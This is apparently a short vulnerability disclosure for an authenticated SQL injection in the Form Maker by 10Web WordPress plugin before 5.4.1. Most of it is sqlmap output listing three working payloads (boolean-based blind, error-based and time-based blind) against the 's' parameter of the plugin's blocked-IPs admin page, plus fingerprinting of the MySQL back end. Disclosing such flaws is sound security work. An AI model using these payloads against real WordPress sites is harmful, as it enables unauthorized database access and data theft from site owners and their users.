Description:
SQL injection in the Form Maker by 10Web WordPress Plugin before 5.4.1
exists via the /wordpress/wp-admin/admin.php?page=blocked_ips_fm&s=1" s
parameter.
Parameter: s (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: page=blocked_ips_fm&s=-1027" OR 8913=8913#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: page=blocked_ips_fm&s=123" AND (SELECT 2867 FROM(SELECT
COUNT(*),CONCAT(0x717a707871,(SELECT
(ELT(2867=2867,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TxQH
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: page=blocked_ips_fm&s=123" AND SLEEP(5)-- oPEC
---
[17:20:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0
Wordpress plugin form maker 5.4.1 s sql injection (authenticated)